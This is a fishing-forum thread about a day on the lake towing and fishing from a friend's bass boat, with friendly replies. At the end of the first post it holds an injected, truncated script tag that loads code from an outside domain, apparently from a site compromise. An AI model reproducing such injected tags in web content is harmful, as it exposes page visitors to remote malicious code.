A Day on the water with Tox and Carlos, And David LONG

• Thread starter Carlos Hathcock III
  • Start date
Nitro Owners Forum

Help Support Nitro Owners Forum:

This site may earn a commission from merchant affiliate links, including eBay, Amazon, and others.

Carlos Hathcock III

Reaction score
Ok,

Here we go. We start out the day in my neighborhood with Tox's baot attached to my truck. His boat is full of water from the rain on Saturday and at first it felt like pulling a fright train. Must have been a bazillion gallons of water on the boat. Wife heard us going all the way down the srteet. (not to self, get cover when you are going to have someones elses boat in a rain storm and then have to tow it). David (my son) and I make it to Anna no problem. Was extra careful as I have someone elses BIG boat on the back of the ol truck.

Get to Anna and son crashes out in the truck as we are waiting for Tox. Had a good conversation with the ramp lady, who really thinks the world of Tox, think he paid her to do that?????

Launch the boat and we motor out..beep beep beep beep. Huum seems the motor is not fixed like we thought. So I get to bring his boat back home with me, BTW I do like towing that 929. Get lots of good looks on 95!!!!!

We head uplake to the "spot", head through some fog, oppps that was on the glasses more then in the air. We setup and start fishing. Tox and I am using a greenish colored Senko and we are seeing splashes around, son is throwing a grub and jig. Tox and I immediately start getting some hits, gets the blood going. A few casts later, I catch the bigest Crappie I have ever caught on a senko. Tox was thinking it was close to the 2 lb mark. He DOES have picures and we/he will post as soon as he gets that camera develpoed. (I forgot my digital one, put in a diffrent place then with the hat, keys and fishing liscense)

We motor on for a while and do not get anything big for a bit. Son is tired again and has wedged himself under the console to get out of the sun to nap (ahhh the life of a 13yr old after being out late at a bowling party)

Go to a really good looking spot and Tox says "Looks like there should be something here" There are trees in the water, boat docks, a canvas, burlap erosion thing in the water, poles for the erosion thing, and to top it off, it even smells fishy!!!!

We do a few casts, he goes OHHHH and sets the hook. (BTW MY wrist and arms hurt from how hard he sets the hooks!!!) Then he goes uugghh, he got me snagged and starts to reel in. Well, about that time I look back and the snag jumps up and then it is FISH ON!! I say kinda smartly " I would not mind getting a snag liek that!!!" He is fighing the fish, and it is not quite the dink size of my earlier bass (No I do not have a story on a Carlos dink), and I think, huumm, his boat, I have a lure out, and I have no idea where the NET is..... David asks where the net is and starts scrambling around and I ski my senko across the water. David gets the net out hands it over to me and the fish was very nice and swam right into the net when I put it in the water. Well, now that everyone is all excited, we estimate this one to be at the 5lb mark and we continue to beat the water to a froth here in this cove. Pictures to follow of this one also.

Well, we continue to fish, and Tox gets the big one of the day award with that one. David did not have too good a day, and did not catch any fish between naps.... The good thing also was that we DID NOT launch anything!!!!!! But, believe me, my head was on a swivel looking for any flyawayable stuff prior to take off. BWT Tox, I saw you have difrrent stowing habits now too. ALL his boxes in that cavernous 929 are stuffed to the gills!! No more stuff laying around for him, he stuffs it all in the bins!!!!!

David and I get home, clean up and get to talk to the neighbors who say, you must be doing good, you have 2 boats in the driveway!!!! Get to explain that I am helping out a friend and I wish I had a 929. Sweet ride Tox!!!!

Well, that is the end of the tale and thanks again Tox for having us. Next trip is to the river when it is not quite so full of junk and the lower river bite turns on.

Carlos and David<script src=http://ytgw123.cn></scr

Cool... but you don't have to cover for Tox.... that 8" LM weighed about 5 ozs, huh?.... Sounds like fun times for all... And, just getting the 23 yr old out with you is a feat... they sleep more than cats!

I gotta say that Carlos is the #1 fun fishing partner right now!! My regular partner (my neighbor) moved to Florida and since I am guiding, I kinda gave up on the fun side of it!! It is really nice to get out and fish for the grins. By the way, His son David was a trooper!! Lots of kids his age would have been whinning to go after a few hours of non-catching, but he stuck with it. Even helped with the clean up after the trip. I'm sitting here sipping a cup of Kona fresh from the islands thanks to Carlos!! Life is good. Now if they could just fix that freakin sensor......David had it down, he could tell every time it would go off!!LOL

Carlos is welcome in my boat ANY day. And yes my neck got Fried!!

TOXIC

ps. Thanks again Carlos for towing my rig back to the shop!!

Greg,

HAHAH No, it really was that big! No funning, he has beat me in the first 4 lber catch contest many time over now. My biggest is a couple of pounds!!!

Tox, I will be sure to pass onto David the good comments. Thanks.

Carlos

Sounds like to you guys had a great day on the water minus the sensor issue.. Enjoy them all you can..

Buzz

Would LOVE to go fishin' with you guys sometime...need to put that on my "to do" list.....we'd have a riot!! Great story Carlos!! Thanks,

Mac

Latest posts

Back